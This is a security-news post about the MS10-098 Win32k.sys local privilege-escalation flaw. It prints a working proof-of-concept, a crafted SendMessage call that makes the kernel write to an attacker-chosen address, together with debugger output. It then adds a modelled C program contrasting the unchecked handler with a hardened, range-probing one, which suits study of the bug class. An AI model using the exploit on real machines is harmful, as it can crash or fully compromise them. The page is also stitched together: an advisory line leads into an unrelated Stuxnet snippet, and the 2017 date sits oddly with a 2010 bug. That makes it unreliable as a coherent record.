January 19, 2017

Microsoft Windows Win32k.sys Local Privilege Escalation Vulnerability

A security researcher at SYSDREAM has discovered a local privilege-escalation vulnerability in Microsoft Windows, located in the ‘Win32k.sys’ kernel-mode driver.

An attacker can exploit this vulnerability locally to execute arbitrary code with kernel-level privileges. According to SecurityFocus, a successful exploit results in the complete compromise of the affected computer, while failed exploit attempts may cause a denial-of-service condition.

Exploit Code:

/*
 * MS10-098
 * CVE-2010-3944
 * Microsoft Windows Win32k pointer dereference
 * --------------------
 * Affected Software
 * ------------------------
 * Microsoft Windows 7 / 2008
 * --------------------
 * Consequences
 * -----------------------
 * An unprivileged user may be able to cause a bugcheck, or possibly execute
 * arbitrary code by CSRSS.EXE.
 * Credits : Stefan LE BERRE (s.leberre@sysdream.com)
 *           Ludo t0ka7a
 * WebSites : http://www.sysdream.com/
 *            http://ghostsinthestack.org/
 *            http://infond.blogspot.com/
 *            http://twitter.com/hackinparis
 * kd> r
 * eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
 * eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0         nv up ei ng nz na pe nc
 * cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
 * win32k!xxxRealDefWindowProc+0xf6:
 * 8d72af90 c60000          mov     byte ptr [eax],0           ds:0023:00013370=??
 */

#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

int main(int argc, char *argv[])
{
    // Message 13 is WM_GETTEXT: wParam 0x80000000 is passed as the buffer size and
    // lParam 0x00013370 as the buffer pointer. The kd output above shows
    // win32k!xxxRealDefWindowProc writing a zero byte to 0x13370 without validating it.
    // 0x13370 is the deref and 16 is the window handle of #32769
    SendMessage((HWND) 16, (UINT) 13, 0x80000000, 0x00013370);
    return 0;
}
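The crash above is the classic shape of a kernel handler trusting a caller-supplied pointer: the WM_GETTEXT path copies text and writes the terminating NUL through lParam without first checking that the whole declared buffer is writable by the caller. The following C program is an added example, not code from the advisory, from SYSDREAM or from Win32k: it models that handler against a tiny constructed address space (the `model_mem` array, the `USER_LO`/`USER_HI` range and the `get_text_*`/`probe_for_write` names are all assumptions of the model) and shows the unchecked pattern beside the hardened one, including why the range check must not be written as `ptr + len`, since a size like the 0x80000000 wParam in the PoC would wrap it.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

/* Constructed model of a flat address space (not Win32k's real layout):
 * offsets in [USER_LO, USER_HI) are the caller's writable buffer range,
 * everything else stands in for kernel memory. */
#define MODEL_MEM_SIZE 0x100u
static unsigned char model_mem[MODEL_MEM_SIZE];
static const uintptr_t USER_LO = 0x40;
static const uintptr_t USER_HI = 0xC0;   /* exclusive */

typedef enum { WRITE_OK = 0, WRITE_REJECTED = 1, WRITE_FAULT = 2 } write_result;

/* True only if [ptr, ptr + len) lies entirely inside the caller's range.
 * The end check is a subtraction, so a huge len such as the 0x80000000
 * wParam in the PoC cannot wrap the arithmetic and slip past the check. */
bool probe_for_write(uintptr_t ptr, size_t len)
{
    if (len == 0 || ptr < USER_LO || ptr >= USER_HI)
        return false;
    return len <= (size_t)(USER_HI - ptr);
}

/* Shared copy body: up to cch - 1 bytes of text, then the NUL terminator at
 * dst[n]. That terminator is the single byte write the kd output above shows. */
static write_result copy_text(uintptr_t dst, size_t cch, const char *text)
{
    size_t n = strlen(text);
    if (cch == 0)
        return WRITE_REJECTED;
    if (n > cch - 1)
        n = cch - 1;
    /* The model cannot address beyond its array; a real kernel bugchecks instead. */
    if (dst >= MODEL_MEM_SIZE || n > MODEL_MEM_SIZE - 1 - dst)
        return WRITE_FAULT;
    memcpy(&model_mem[dst], text, n);
    model_mem[dst + n] = 0;
    return WRITE_OK;
}

/* Flawed pattern: trusts lParam as a pointer and writes wherever it points. */
write_result get_text_unchecked(uintptr_t lparam, size_t cch, const char *text)
{
    return copy_text(lparam, cch, text);
}

/* Hardened pattern: probe the whole declared destination before any write. */
write_result get_text_checked(uintptr_t lparam, size_t cch, const char *text)
{
    if (!probe_for_write(lparam, cch))
        return WRITE_REJECTED;
    return copy_text(lparam, cch, text);
}

/* Read back one byte of the model so callers can see what was clobbered. */
unsigned char model_byte(uintptr_t off)
{
    return off < MODEL_MEM_SIZE ? model_mem[off] : 0;
}

int main(void)
{
    /* 0x10 is "kernel" memory in the model: only the unchecked handler touches it. */
    printf("unchecked write to 0x10: %d, byte now 0x%02x\n",
           get_text_unchecked(0x10, 8, "hi"), model_byte(0x10));
    printf("checked write to 0x10: %d\n", get_text_checked(0x10, 8, "hi"));
    printf("checked write, cch 0x80000000: %d\n",
           get_text_checked(0x40, (size_t)0x80000000u, "hi"));
    printf("checked write inside caller range: %d\n",
           get_text_checked(0x40, 0x80, "hi"));
    return 0;
}
```

The probe validates the size the caller declared, not the length of the text actually copied: a handler that only checks the bytes it happens to write this time still leaves the terminator write, and any later larger copy, unguarded.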

The vendor has released an advisory and updates:

Exploit released for unpatched Stuxnet hole

Microsoft has already patched three of the four security holes exploited by Stuxnet, but the fourth hole remains unpatched. Now, an exploit, currently being circulated on the web, exploits the remaining hole in the Windows Task Planner to access protected system directories – even if a user is only logged in with limited access privileges. Experts call this a privilege escalation attack.

Read the full story here.